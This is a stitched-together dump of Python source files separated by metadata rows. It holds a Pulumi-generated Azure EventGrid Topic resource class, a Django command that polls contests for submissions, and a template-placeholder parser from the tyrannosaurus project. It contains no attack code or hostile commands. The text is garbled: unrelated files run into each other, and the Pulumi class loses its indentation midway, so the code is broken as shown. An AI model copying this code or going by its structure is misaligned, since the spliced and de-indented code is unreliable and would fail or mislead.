        :param pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]] inbound_ip_rules: One or more `inbound_ip_rule` blocks as defined below.
        :param pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs'] input_mapping_default_values: An `input_mapping_default_values` block as defined below.
        :param pulumi.Input['EventGridTopicInputMappingFieldsArgs'] input_mapping_fields: An `input_mapping_fields` block as defined below.
        :param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        """
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        if inbound_ip_rules is not None:
            pulumi.set(__self__, "inbound_ip_rules", inbound_ip_rules)
        if input_mapping_default_values is not None:
            pulumi.set(__self__, "input_mapping_default_values", input_mapping_default_values)
        if input_mapping_fields is not None:
            pulumi.set(__self__, "input_mapping_fields", input_mapping_fields)
        if input_schema is not None:
            pulumi.set(__self__, "input_schema", input_schema)
        if location is not None:
            pulumi.set(__self__, "location", location)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if public_network_access_enabled is not None:
            pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="inboundIpRules")
    def inbound_ip_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]]]:
        """
        One or more `inbound_ip_rule` blocks as defined below.
        """
        return pulumi.get(self, "inbound_ip_rules")

    @inbound_ip_rules.setter
    def inbound_ip_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]]]):
        pulumi.set(self, "inbound_ip_rules", value)

    @property
    @pulumi.getter(name="inputMappingDefaultValues")
    def input_mapping_default_values(self) -> Optional[pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs']]:
        """
        An `input_mapping_default_values` block as defined below.
        """
        return pulumi.get(self, "input_mapping_default_values")

    @input_mapping_default_values.setter
    def input_mapping_default_values(self, value: Optional[pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs']]):
        pulumi.set(self, "input_mapping_default_values", value)

    @property
    @pulumi.getter(name="inputMappingFields")
    def input_mapping_fields(self) -> Optional[pulumi.Input['EventGridTopicInputMappingFieldsArgs']]:
        """
        An `input_mapping_fields` block as defined below.
        """
        return pulumi.get(self, "input_mapping_fields")

    @input_mapping_fields.setter
    def input_mapping_fields(self, value: Optional[pulumi.Input['EventGridTopicInputMappingFieldsArgs']]):
        pulumi.set(self, "input_mapping_fields", value)

    @property
    @pulumi.getter(name="inputSchema")
    def input_schema(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "input_schema")

    @input_schema.setter
    def input_schema(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "input_schema", value)

    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "location")

    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "location", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="publicNetworkAccessEnabled")
    def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether or not public network access is allowed for this server. Defaults to `true`.
        """
        return pulumi.get(self, "public_network_access_enabled")

    @public_network_access_enabled.setter
    def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "public_network_access_enabled", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
@pulumi.input_type
class _EventGridTopicState:
    def __init__(__self__, *,
                 endpoint: Optional[pulumi.Input[str]] = None,
                 inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]]] = None,
                 input_mapping_default_values: Optional[pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs']] = None,
                 input_mapping_fields: Optional[pulumi.Input['EventGridTopicInputMappingFieldsArgs']] = None,
                 input_schema: Optional[pulumi.Input[str]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 primary_access_key: Optional[pulumi.Input[str]] = None,
                 public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 secondary_access_key: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
        """
        Input properties used for looking up and filtering EventGridTopic resources.
        :param pulumi.Input[str] endpoint: The Endpoint associated with the EventGrid Topic.
        :param pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]] inbound_ip_rules: One or more `inbound_ip_rule` blocks as defined below.
        :param pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs'] input_mapping_default_values: An `input_mapping_default_values` block as defined below.
        :param pulumi.Input['EventGridTopicInputMappingFieldsArgs'] input_mapping_fields: An `input_mapping_fields` block as defined below.
        :param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
        :param pulumi.Input[str] primary_access_key: The Primary Shared Access Key associated with the EventGrid Topic.
        :param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] secondary_access_key: The Secondary Shared Access Key associated with the EventGrid Topic.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        """
        if endpoint is not None:
            pulumi.set(__self__, "endpoint", endpoint)
        if inbound_ip_rules is not None:
            pulumi.set(__self__, "inbound_ip_rules", inbound_ip_rules)
        if input_mapping_default_values is not None:
            pulumi.set(__self__, "input_mapping_default_values", input_mapping_default_values)
        if input_mapping_fields is not None:
            pulumi.set(__self__, "input_mapping_fields", input_mapping_fields)
        if input_schema is not None:
            pulumi.set(__self__, "input_schema", input_schema)
        if location is not None:
            pulumi.set(__self__, "location", location)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if primary_access_key is not None:
            pulumi.set(__self__, "primary_access_key", primary_access_key)
        if public_network_access_enabled is not None:
            pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
        if resource_group_name is not None:
            pulumi.set(__self__, "resource_group_name", resource_group_name)
        if secondary_access_key is not None:
            pulumi.set(__self__, "secondary_access_key", secondary_access_key)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    @property
    @pulumi.getter
    def endpoint(self) -> Optional[pulumi.Input[str]]:
        """
        The Endpoint associated with the EventGrid Topic.
        """
        return pulumi.get(self, "endpoint")

    @endpoint.setter
    def endpoint(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "endpoint", value)

    @property
    @pulumi.getter(name="inboundIpRules")
    def inbound_ip_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]]]:
        """
        One or more `inbound_ip_rule` blocks as defined below.
        """
        return pulumi.get(self, "inbound_ip_rules")

    @inbound_ip_rules.setter
    def inbound_ip_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]]]):
        pulumi.set(self, "inbound_ip_rules", value)

    @property
    @pulumi.getter(name="inputMappingDefaultValues")
    def input_mapping_default_values(self) -> Optional[pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs']]:
        """
        An `input_mapping_default_values` block as defined below.
        """
        return pulumi.get(self, "input_mapping_default_values")

    @input_mapping_default_values.setter
    def input_mapping_default_values(self, value: Optional[pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs']]):
        pulumi.set(self, "input_mapping_default_values", value)

    @property
    @pulumi.getter(name="inputMappingFields")
    def input_mapping_fields(self) -> Optional[pulumi.Input['EventGridTopicInputMappingFieldsArgs']]:
        """
        An `input_mapping_fields` block as defined below.
        """
        return pulumi.get(self, "input_mapping_fields")

    @input_mapping_fields.setter
    def input_mapping_fields(self, value: Optional[pulumi.Input['EventGridTopicInputMappingFieldsArgs']]):
        pulumi.set(self, "input_mapping_fields", value)

    @property
    @pulumi.getter(name="inputSchema")
    def input_schema(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "input_schema")

    @input_schema.setter
    def input_schema(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "input_schema", value)

    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "location")

    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "location", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="primaryAccessKey")
    def primary_access_key(self) -> Optional[pulumi.Input[str]]:
        """
        The Primary Shared Access Key associated with the EventGrid Topic.
        """
        return pulumi.get(self, "primary_access_key")

    @primary_access_key.setter
    def primary_access_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "primary_access_key", value)

    @property
    @pulumi.getter(name="publicNetworkAccessEnabled")
    def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether or not public network access is allowed for this server. Defaults to `true`.
        """
        return pulumi.get(self, "public_network_access_enabled")

    @public_network_access_enabled.setter
    def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "public_network_access_enabled", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="secondaryAccessKey")
    def secondary_access_key(self) -> Optional[pulumi.Input[str]]:
        """
        The Secondary Shared Access Key associated with the EventGrid Topic.
        """
        return pulumi.get(self, "secondary_access_key")

    @secondary_access_key.setter
    def secondary_access_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "secondary_access_key", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
warnings.warn("""azure.eventhub.EventGridTopic has been deprecated in favor of azure.eventgrid.Topic""", DeprecationWarning)
class EventGridTopic(pulumi.CustomResource):
warnings.warn("""azure.eventhub.EventGridTopic has been deprecated in favor of azure.eventgrid.Topic""", DeprecationWarning)
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EventGridTopicInboundIpRuleArgs']]]]] = None,
input_mapping_default_values: Optional[pulumi.Input[pulumi.InputType['EventGridTopicInputMappingDefaultValuesArgs']]] = None,
input_mapping_fields: Optional[pulumi.Input[pulumi.InputType['EventGridTopicInputMappingFieldsArgs']]] = None,
input_schema: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages an EventGrid Topic
> **Note:** at this time EventGrid Topic's are only available in a limited number of regions.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_topic = azure.eventgrid.Topic("exampleTopic",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tags={
"environment": "Production",
})
```
## Import
EventGrid Topic's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:eventhub/eventGridTopic:EventGridTopic topic1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.EventGrid/topics/topic1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EventGridTopicInboundIpRuleArgs']]]] inbound_ip_rules: One or more `inbound_ip_rule` blocks as defined below.
:param pulumi.Input[pulumi.InputType['EventGridTopicInputMappingDefaultValuesArgs']] input_mapping_default_values: A `input_mapping_default_values` block as defined below.
:param pulumi.Input[pulumi.InputType['EventGridTopicInputMappingFieldsArgs']] input_mapping_fields: A `input_mapping_fields` block as defined below.
:param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: EventGridTopicArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an EventGrid Topic
> **Note:** at this time EventGrid Topic's are only available in a limited number of regions.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_topic = azure.eventgrid.Topic("exampleTopic",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tags={
"environment": "Production",
})
```
## Import
EventGrid Topic's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:eventhub/eventGridTopic:EventGridTopic topic1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.EventGrid/topics/topic1
```
:param str resource_name: The name of the resource.
:param EventGridTopicArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(EventGridTopicArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EventGridTopicInboundIpRuleArgs']]]]] = None,
input_mapping_default_values: Optional[pulumi.Input[pulumi.InputType['EventGridTopicInputMappingDefaultValuesArgs']]] = None,
input_mapping_fields: Optional[pulumi.Input[pulumi.InputType['EventGridTopicInputMappingFieldsArgs']]] = None,
input_schema: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
pulumi.log.warn("""EventGridTopic is deprecated: azure.eventhub.EventGridTopic has been deprecated in favor of azure.eventgrid.Topic""")
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = EventGridTopicArgs.__new__(EventGridTopicArgs)
__props__.__dict__["inbound_ip_rules"] = inbound_ip_rules
__props__.__dict__["input_mapping_default_values"] = input_mapping_default_values
__props__.__dict__["input_mapping_fields"] = input_mapping_fields
__props__.__dict__["input_schema"] = input_schema
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
__props__.__dict__["endpoint"] = None
__props__.__dict__["primary_access_key"] = None
__props__.__dict__["secondary_access_key"] = None
super(EventGridTopic, __self__).__init__(
'azure:eventhub/eventGridTopic:EventGridTopic',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
endpoint: Optional[pulumi.Input[str]] = None,
inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EventGridTopicInboundIpRuleArgs']]]]] = None,
input_mapping_default_values: Optional[pulumi.Input[pulumi.InputType['EventGridTopicInputMappingDefaultValuesArgs']]] = None,
input_mapping_fields: Optional[pulumi.Input[pulumi.InputType['EventGridTopicInputMappingFieldsArgs']]] = None,
input_schema: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
primary_access_key: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
secondary_access_key: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'EventGridTopic':
"""
Get an existing EventGridTopic resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] endpoint: The Endpoint associated with the EventGrid Topic.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EventGridTopicInboundIpRuleArgs']]]] inbound_ip_rules: One or more `inbound_ip_rule` blocks as defined below.
:param pulumi.Input[pulumi.InputType['EventGridTopicInputMappingDefaultValuesArgs']] input_mapping_default_values: A `input_mapping_default_values` block as defined below.
:param pulumi.Input[pulumi.InputType['EventGridTopicInputMappingFieldsArgs']] input_mapping_fields: A `input_mapping_fields` block as defined below.
:param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
:param pulumi.Input[str] primary_access_key: The Primary Shared Access Key associated with the EventGrid Topic.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] secondary_access_key: The Secondary Shared Access Key associated with the EventGrid Topic.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _EventGridTopicState.__new__(_EventGridTopicState)
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["inbound_ip_rules"] = inbound_ip_rules
__props__.__dict__["input_mapping_default_values"] = input_mapping_default_values
__props__.__dict__["input_mapping_fields"] = input_mapping_fields
__props__.__dict__["input_schema"] = input_schema
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["primary_access_key"] = primary_access_key
__props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["secondary_access_key"] = secondary_access_key
__props__.__dict__["tags"] = tags
return EventGridTopic(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def endpoint(self) -> pulumi.Output[str]:
"""
The Endpoint associated with the EventGrid Topic.
"""
return pulumi.get(self, "endpoint")
@property
@pulumi.getter(name="inboundIpRules")
def inbound_ip_rules(self) -> pulumi.Output[Optional[Sequence['outputs.EventGridTopicInboundIpRule']]]:
"""
One or more `inbound_ip_rule` blocks as defined below.
"""
return pulumi.get(self, "inbound_ip_rules")
@property
@pulumi.getter(name="inputMappingDefaultValues")
def input_mapping_default_values(self) -> pulumi.Output[Optional['outputs.EventGridTopicInputMappingDefaultValues']]:
"""
A `input_mapping_default_values` block as defined below.
"""
return pulumi.get(self, "input_mapping_default_values")
@property
@pulumi.getter(name="inputMappingFields")
def input_mapping_fields(self) -> pulumi.Output[Optional['outputs.EventGridTopicInputMappingFields']]:
"""
A `input_mapping_fields` block as defined below.
"""
return pulumi.get(self, "input_mapping_fields")
@property
@pulumi.getter(name="inputSchema")
def input_schema(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "input_schema")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="primaryAccessKey")
def primary_access_key(self) -> pulumi.Output[str]:
"""
The Primary Shared Access Key associated with the EventGrid Topic.
"""
return pulumi.get(self, "primary_access_key")
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Whether or not public network access is allowed for this EventGrid Topic. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="secondaryAccessKey")
def secondary_access_key(self) -> pulumi.Output[str]:
"""
The Secondary Shared Access Key associated with the EventGrid Topic.
"""
return pulumi.get(self, "secondary_access_key")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 51.916042
| 294
| 0.692705
|
4a188fc5e3ef7ae9d8ca69c2affdf7259e61127e
| 439
|
py
|
Python
|
clerk/management/commands/clerk_worker.py
|
mingaleg/yakubovich
|
95398c78eaffbd6ff69f8fdbedfc847531219d8a
|
[
"MIT"
] | 5
|
2018-12-12T16:24:42.000Z
|
2020-02-29T18:45:30.000Z
|
clerk/management/commands/clerk_worker.py
|
mingaleg/yakubovich
|
95398c78eaffbd6ff69f8fdbedfc847531219d8a
|
[
"MIT"
] | 3
|
2020-06-05T17:47:13.000Z
|
2022-02-11T03:39:54.000Z
|
clerk/management/commands/clerk_worker.py
|
mingaleg/yakubovich
|
95398c78eaffbd6ff69f8fdbedfc847531219d8a
|
[
"MIT"
] | null | null | null |
from time import sleep
from django.core.management.base import BaseCommand, CommandError
from ...models import Contest
class Command(BaseCommand):
help = 'Runs the clerk routine'
def handle(self, *args, **options):
try:
while True:
for contest in Contest.objects.all():
contest.pull_new_submissions()
sleep(1)
except KeyboardInterrupt:
pass
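# Hedged usage note: as a standard Django management command, this worker is
# typically started from the project root with
#
#   python manage.py clerk_worker
#
# (assuming the `clerk` app is listed in INSTALLED_APPS); it then polls every
# Contest for new submissions once per second until interrupted with Ctrl-C.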
| 25.823529
| 65
| 0.605923
|
4a18900fa4ad449c23a5ffe0427f257099441318
| 4,640
|
py
|
Python
|
tyrannosaurus/parser.py
|
oehs7/tyrannosaurus
|
70a650f194bc8f2bd178b76c0256c34645ebfe8e
|
[
"Apache-2.0"
] | 63
|
2020-05-06T21:48:01.000Z
|
2022-03-24T21:10:20.000Z
|
tyrannosaurus/parser.py
|
dmyersturnbull/tyrannosaurus
|
a369dafc45963e8cb2db2f12e7747191043eac30
|
[
"Apache-2.0"
] | 119
|
2020-05-07T23:07:24.000Z
|
2022-03-28T18:04:52.000Z
|
tyrannosaurus/parser.py
|
oehs7/tyrannosaurus
|
70a650f194bc8f2bd178b76c0256c34645ebfe8e
|
[
"Apache-2.0"
] | 6
|
2020-05-16T05:36:47.000Z
|
2022-02-24T13:47:23.000Z
|
"""
Parsing of various files.
Original source: https://github.com/dmyersturnbull/tyrannosaurus
Copyright 2020–2021 Douglas Myers-Turnbull
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0
"""
from typing import Any, Optional, Sequence, Union
from tyrannosaurus import TyrannoInfo
from tyrannosaurus.enums import DevStatus, License
class LiteralParser:
def __init__(
self,
project: str,
user: Optional[str],
authors: Optional[Sequence[str]],
description: str,
keywords: Sequence[str],
version: str,
status: DevStatus,
license_name: Union[str, License],
tyranno_vr: str,
):
self.project = project.lower()
# TODO doing this in two places
self.pkg = project.replace("_", "").replace("-", "").replace(".", "").lower()
self.user = user
self.authors = authors
self.description = description
self.keywords = keywords
self.version = version
self.status = status
self.license = License.of(license_name)
self.tyranno_vr = tyranno_vr
def parse(self, s: str) -> str:
today, now, now_utc = TyrannoInfo.today, TyrannoInfo.now, TyrannoInfo.now_utc
timestamp, utc_stamp = (
TyrannoInfo.pretty_timestamp_with_offset,
TyrannoInfo.pretty_timestamp_utc,
)
reps = {
"today": str(today),
"today.str": today.strftime("%Y-%m-%d"),
"today.year": str(today.year),
"today.month": str(today.month),
"today.Month": today.strftime("%B"),
"today.day": str(today.day),
"now": timestamp,
"now.utc": utc_stamp,
"now.iso": now.replace(microsecond=0).isoformat(),
"now.utciso": now_utc.replace(microsecond=0).isoformat(),
"now.hour": str(now.hour),
"now.minute": str(now.minute),
"now.second": str(now.second),
"project": self.project.lower(),
"Project": self.project.capitalize(),
"PROJECT": self.project.upper(),
"pkg": self.pkg,
"Pkg": self.pkg.title(),
"user": "<<TODO:user>>" if self.user is None else self.user,
"authors": self._pretty(self.authors),
"authors.list": self._list(self.authors),
"version": self.version,
"status.Name": self.status.name.capitalize(),
"status.name": self.status.name,
"status.pypi": self.status.pypi,
"status.dunder": self.status.dunder,
"status.Description": self.status.description.capitalize(),
"status.Description.": self._sentence(self.status.description),
"status.description": self.status.description,
"Description": self.description.capitalize(),
"description": self.description,
"Description.": self._sentence(self.description),
"keywords": self._pretty(self.keywords),
"keywords.list": self._list(self.keywords),
"license": self.license.name,
"license.name": self.license.full_name,
"license.spdx": self.license.spdx,
"license.official": self.license.spdx,
"license.family": self.license.family,
"license.header": self.download_license_template(header=True),
"license.full": self.download_license_template(header=False),
"license.url": self.license.url,
"tyranno.version": self.tyranno_vr,
}
for k, v in reps.items():
s = s.replace("$${" + k + "}", v)
return s
def download_license_template(self, header: bool) -> str:
text = self.license.download_header() if header else self.license.download_license()
return (
text.replace("{{ organization }}", ", ".join(self.authors))
.replace("{{ year }}", str(TyrannoInfo.today.year))
.replace("{{ project }}", self.project)
)
